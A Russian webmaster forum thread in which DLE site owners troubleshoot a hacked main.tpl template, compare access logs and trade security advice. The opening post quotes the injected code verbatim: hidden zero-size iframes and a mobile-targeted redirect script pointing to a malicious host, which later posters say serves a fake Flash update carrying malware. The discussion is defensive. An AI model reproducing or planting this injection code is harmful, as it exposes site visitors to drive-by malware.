- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день. Сегодня взломали мой сайт на ДЛЕ. Причем с виду вроде ничего подозрительного и антивир не ругался. Вот только некоторые скрипты перестали работать, зайдя в main.tpl увидел такую картину:
<iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe>
<script type="text/javascript">
<!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://simple.ttds.ru/go.php?sid=9"; } //--> </script><!--/x813n--><!--x813n--><iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe> <script type="text/javascript">
<!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://simple.ttds.ru/go.php?sid=9"; } //--> </script><!--/x813n--><!--x813n--><iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe> <script type="text/javascript">
<!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://simple.ttds.ru/go.php?sid=9"; } //--> </script><!--/x813n--><!--x813n--><iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe>
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://simple.ttds.ru/go.php?sid=9";
}
//-->
</script><!--/x813n-->
Вроде распространялось только на владельцев телефонов, со своего заходить не пробовал, посему в чем проблема не знаю. Урл подозрительный при переходе открывается ya.ru. (открывал с ПК, возможно на этом сайте только с телефонами идут какие-то действия.)
Покопавшись в логах увидел такую картину:
46.211.109.188 - - [08/Dec/2012:15:47:40 +0200] "GET /engine/skins/codemirror/css/default.css HTTP/1.1" 200 2350 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:40 +0200] "GET /engine/classes/min/index.php?charset=windows-1251&f=engine/skins/filetree.js,engine/skins/codemirror/js/code.js&6 HTTP/1.0" 200 18264 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "GET /engine/skins/images/spinner.gif HTTP/1.1" 200 2530 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "POST /engine/ajax/templates.php HTTP/1.0" 200 4606 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "GET /engine/skins/images/css.png HTTP/1.1" 200 618 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "GET /engine/skins/images/html.png HTTP/1.1" 200 734 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "GET /engine/skins/images/directory.png HTTP/1.1" 200 537 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:41 +0200] "GET /engine/skins/images/script.png HTTP/1.1" 200 859 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
46.211.109.188 - - [08/Dec/2012:15:47:44 +0200] "POST /engine/ajax/templates.php HTTP/1.0" 200 18167 "http://site.ru/admin.php?mod=templates&user_hash=9f336c8f337f19c74898f343c9292ce9" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11"
Каким образом решить проблему? Хэш, это запоминание пароля?
Набрав эту строку в своем браузере попал в админку на страницу редактирования шаблона. Там то они и закинули этот скрипт и main.tpl.
Как избавится от этой дырки? Доступ администратора имею не только я, но и еще 4 человека. Как узнать какой логин конкретно виноват? :) Прошу помощи. На сайте ДЛЕ написано что есть фиксы, попробую поставить сегодня.
Всем спасибо за ответы и советы!
последний багфикс ставили?
Та же ситуация сегодня возникла.. Те багфиксы которые на сайте DLE немног оне за то отвечают.. да и последние уже были сделаны.
На сервере отключен register_globals
Поставил усиленый вход а админку и сменил пароли.. посмотрим что дальше будет.
Странный какойто скрипт по идеи должен показываться только телефонам и кпк а нифига.. на всех стандартных браузерах всплывал ..
Та же ситуация сегодня возникла.. Те багфиксы которые на сайте DLE немног оне за то отвечают.. да и последние уже были сделаны.
На сервере отключен register_globals
Поставил усиленый вход а админку и сменил пароли.. посмотрим что дальше будет.
Странный какойто скрипт по идеи должен показываться только телефонам и кпк а нифига.. на всех стандартных браузерах всплывал ..
Где-то ошибка в скрипте или кавычки не хватает где-то т.к у меня некоторые скрипты отказались работать. Какой браузер используете? Пароль сохраняете от админки?
---------- Добавлено 09.12.2012 в 01:14 ----------
последний багфикс ставили?
Нет. Последний и предпоследний фиксы не стоят. Думаю тут дело в другом.
Тоже поймал гадость эту. dle 8.2 , кричал avast, а так бы и не заметил :(
удалив <iframe src="http://simple.ttds.ru/go.php?sid=8" width="0" height="0" frameborder="0"></iframe>
Антивирусник кричать перестал. Пытаюсь разобраться от куда пришло, пока без успешно
Ссылка заработала. Предлагает якобы обновить флеш плеер. Естественно с вирусом. Тянет отсюда: http://jojo.ge/ Вопрос о дырке все так же открыт.
Вопрос о дырке все так же открыт.
Сколько сайтов на аккаунте? Раньше взломы бывали? Какой сложности пароль? Устанавливали ли вы текущую версию с нуля или делали апгрейд? Фиксы... После их установки, меняли все пароли от админ аккаунтов и к базе данных? Искали на хостинге шеллы и бэкдоры? Установлены ли какие-то модули на сайте?
Админку переименовать, права на запись шаблонов снять и заливать файлы только через ФТП,
Не обязательно, что проблема именно в дырке движка, вариантов взлома уйма, тут нужно осмотреть и анализировать на найденом, если сами не справитесь стучите, проверим сайт на все вредоносное + дадим рекомендации!
Сколько сайтов на аккаунте? Раньше взломы бывали? Какой сложности пароль? Устанавливали ли вы текущую версию с нуля или делали апгрейд? Фиксы... После их установки, меняли все пароли от админ аккаунтов и к базе данных? Искали на хостинге шеллы и бэкдоры? Установлены ли какие-то модули на сайте?
На аккаунте 5 доменов. Взломан только один.
Раньше взламывали тоже подменяли main.tpl, но тогда проблема была в дырке модуля. Модуль удалил и написал свой с 0. так что той дырки уже нет.
Пароль довольно сложный 15 символов с прописными буквами и цифрами - брут отпадает.
Делались апдейты движка начиная с версии 8.5 и до сегодня. Пароли везде поменяны после того взлома и логин для входа в админку. Шеллы и бэкдоры не искал. Буду признателен если подскажите ссылку, где можно почитать или проверить. На данный момент сторонних модулей на сайте нет, хотя свой модуль написан, у него есть работа с бд.
Меня тоже вчера взломали (при заходе на сайт окно - скачать .exe на андроид). DLE 9.5, код вставили в main.tpl, другие файлы не трогали. Первое что заметил, в папку с темой забил залить htaccess, хотя думаю это из за пароля (123) который как известно, часто перебирают. Проверил соседние сайты, - все ок.
Думаю кто то из ваших друзей накосячил.